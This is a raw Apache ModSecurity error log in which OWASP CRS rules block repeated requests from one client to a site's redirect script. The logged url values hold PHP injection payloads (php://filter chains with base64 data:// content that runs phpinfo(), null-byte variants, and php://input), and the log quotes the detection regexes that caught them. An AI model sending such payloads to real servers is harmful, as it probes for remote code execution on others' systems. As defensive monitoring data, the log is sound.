[Tue May 12 05:32:48.601448 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/convert.base64-decode/convert.base64-decode/resource=data://plain/text,UEQ5d2FIQWdjR2h3YVc1bWJ5Z3BPeUEvUGc9PQ=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrgAAAFU"]
[Tue May 12 05:32:48.601627 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: .base64 found within ARGS:url: php://filter/convert.base64-decode/convert.base64-decode/resource=data://plain/text,UEQ5d2FIQWdjR2h3YVc1bWJ5Z3BPeUEvUGc9PQ=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrgAAAFU"]
[Tue May 12 05:32:48.602170 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrgAAAFU"]
[Tue May 12 05:32:48.602424 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrgAAAFU"]
[Tue May 12 05:32:48.741473 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrwAAAFU"]
[Tue May 12 05:32:48.741538 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrwAAAFU"]
[Tue May 12 05:32:48.741852 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/convert.base64-decode/convert.base64-decode/resource=data://plain/text,UEQ5d2FIQWdjR2h3YVc1bWJ5Z3BPeUEvUGc9PQ==\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrwAAAFU"]
[Tue May 12 05:32:48.742034 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: .base64 found within ARGS:url: php://filter/convert.base64-decode/convert.base64-decode/resource=data://plain/text,UEQ5d2FIQWdjR2h3YVc1bWJ5Z3BPeUEvUGc9PQ=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrwAAAFU"]
[Tue May 12 05:32:48.742570 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrwAAAFU"]
[Tue May 12 05:32:48.742839 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigrwAAAFU"]
[Tue May 12 05:32:48.881915 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigsQAAAFU"]
[Tue May 12 05:32:48.882094 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: .base64 found within ARGS:url: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigsQAAAFU"]
[Tue May 12 05:32:48.882640 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigsQAAAFU"]
[Tue May 12 05:32:48.882940 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYNr1yOh9TvizezigsQAAAFU"]
[Tue May 12 05:32:48.912440 2026] [security2:error] [pid 1844863:tid 1844886] [client 43.130.9.111:52914] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "habilis.space"] [uri "/"] [unique_id "agKfYPaAnTZtx1_H_wy36AAAAVE"]
[Tue May 12 05:32:49.021662 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYdr1yOh9TvizezigsgAAAFU"]
[Tue May 12 05:32:49.021732 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYdr1yOh9TvizezigsgAAAFU"]
[Tue May 12 05:32:49.022067 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgcGhwaW5mbygpOyA/Pg==\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYdr1yOh9TvizezigsgAAAFU"]
[Tue May 12 05:32:49.022223 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: .base64 found within ARGS:url: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYdr1yOh9TvizezigsgAAAFU"]
[Tue May 12 05:32:49.022797 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYdr1yOh9TvizezigsgAAAFU"]
[Tue May 12 05:32:49.023097 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYdr1yOh9TvizezigsgAAAFU"]
[Tue May 12 05:32:50.522328 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYtr1yOh9TvizeziguwAAAFU"]
[Tue May 12 05:32:50.522376 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYtr1yOh9TvizeziguwAAAFU"]
[Tue May 12 05:32:50.523134 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 8)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYtr1yOh9TvizeziguwAAAFU"]
[Tue May 12 05:32:50.523388 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfYtr1yOh9TvizeziguwAAAFU"]
[Tue May 12 05:32:50.612813 2026] [:error] [pid 1825287:tid 1825326] [client 51.75.85.213:58984] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:32:51.240220 2026] [:error] [pid 1820198:tid 1820223] [client 51.75.85.213:52109] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:32:51.703110 2026] [security2:error] [pid 1825179:tid 1825205] [client 43.130.9.111:56384] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "habilis.space"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agKfY9r1yOh9TvizezigwgAAAEc"], referer: http://habilis.space
[Tue May 12 05:32:52.204499 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfZNr1yOh9TvizezigxQAAAFU"]
[Tue May 12 05:32:52.204556 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfZNr1yOh9TvizezigxQAAAFU"]
[Tue May 12 05:32:52.205330 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 8)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfZNr1yOh9TvizezigxQAAAFU"]
[Tue May 12 05:32:52.205599 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfZNr1yOh9TvizezigxQAAAFU"]
[Tue May 12 05:32:52.344393 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://input found within ARGS:url: php://input"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfZNr1yOh9TvizezigxgAAAFU"]
[Tue May 12 05:32:52.344936 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfZNr1yOh9TvizezigxgAAAFU"]
[Tue May 12 05:32:52.345217 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfZNr1yOh9TvizezigxgAAAFU"]
[Tue May 12 05:32:52.483838 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfZNr1yOh9TvizezigxwAAAFU"]
[Tue May 12 05:32:52.483934 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfZNr1yOh9TvizezigxwAAAFU"]
